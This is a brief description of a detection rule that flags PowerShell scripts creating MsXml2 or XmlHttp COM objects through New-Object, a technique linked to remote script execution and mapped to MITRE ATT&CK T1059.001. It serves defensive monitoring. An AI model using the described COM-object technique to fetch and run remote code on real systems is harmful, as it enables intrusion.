This detection rule identifies the use of PowerShell commands specifically leveraging the MsXml COM object, which is commonly associated with the execution of remote scripts or HTTP requests. PowerShell is frequently exploited by adversaries for unauthorized actions such as system discovery and code execution. The rule triggers if a PowerShell script contains the `New-Object` command instantiated with `-ComObject` for `MsXml2` or `XmlHttp`. It is important for organizations to monitor such activities as they may indicate potential malicious behavior. To effectively utilize this rule, Script Block Logging must be enabled on Windows systems. Although legitimate administrative scripts may generate false positives for this detection, logging such events helps in uncovering and investigating potential intrusions. This rule is particularly focused on monitoring for exploitation techniques that fall under the 'Execution' tactic of the MITRE ATT&CK framework, specifically T1059.001.